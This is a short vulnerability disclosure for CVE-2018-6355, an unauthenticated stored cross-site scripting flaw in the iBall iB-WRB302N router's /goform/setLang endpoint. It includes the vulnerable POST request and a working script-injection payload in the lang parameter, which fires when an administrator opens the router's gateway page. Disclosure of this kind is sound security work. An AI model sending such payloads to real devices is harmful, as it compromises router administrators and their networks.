Created
January 30, 2018 15:27
Stored XSS in iBall router CVE-2018-6355
> /goform/setLang on iBall 300M devices with "iB-WRB302N_1.0.1-Sep 8
> 2017" firmware has Unauthenticated Stored Cross Site Scripting via the
> lang parameter.
>
> ------------------------------------------
>
> [Additional Information]
> Below find the Vulnerable POST request
>
> POST /goform/setLang HTTP/1.1
> Cookie: bLanguage=en
>
> lang=en";</script><script>alert(document.domain);</script>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> iBall
>
> ------------------------------------------
>
> [Affected Product Code Base]
> 300M 2-Port Wireless-N Broadband Router - iB-WRB302N_1.0.1-Sep 8 2017
>
> ------------------------------------------
>
> [Affected Component]
> iBall 300M 2-Port Wireless-N Broadband Router is affected by Stored Cross Site
> Scripting - "lang" parameter is vulnerable for XSS
>
> ------------------------------------------
>
> [Attack Type]
> Local
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> An unauthenticated attacker will set lang parameter to
> "lang=en";</script><script>alert(document.domain);</script>" - the
> JavaScript will be stored in the router homepage. Whenever an admin goes
> to the router gateway (i.e., 192.168.1.1), stored XSS will execute.
>
> ------------------------------------------
>
> [Discoverer]
> Mayur Udiniya